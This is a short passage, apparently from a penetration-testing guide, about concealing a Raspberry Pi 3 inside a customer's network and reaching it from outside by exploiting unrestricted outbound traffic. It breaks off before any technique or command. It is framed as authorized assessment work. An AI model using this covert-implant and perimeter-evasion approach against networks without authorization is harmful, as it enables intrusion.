The small form factor of the Raspberry Pi makes it an awesome platform for concealed or otherwise inconspicuous deployment inside the customer's environment. Many organizations have security measures in place to block incoming connections with the goal of preventing backdoors into their network. In a white-box assessment, we may be explicitly able to open up a Firewall to permit SSH to our Raspberry Pi, as shown in the following image. The bad news is even if this is possible from a policy standpoint, it may be difficult to achieve when dealing with multiple sites under multiple administrative controls. Either way, breaking through perimeter defenses as step 1 of a penetration test, however, makes a lot of noise and will leave us either frustrated or looking for work. So how do we, out here in the wild, communicate with our Raspberry Pi 3 on the inside?
We can take advantage of the fact that most organizations do not restrict outbound traffic by default on their...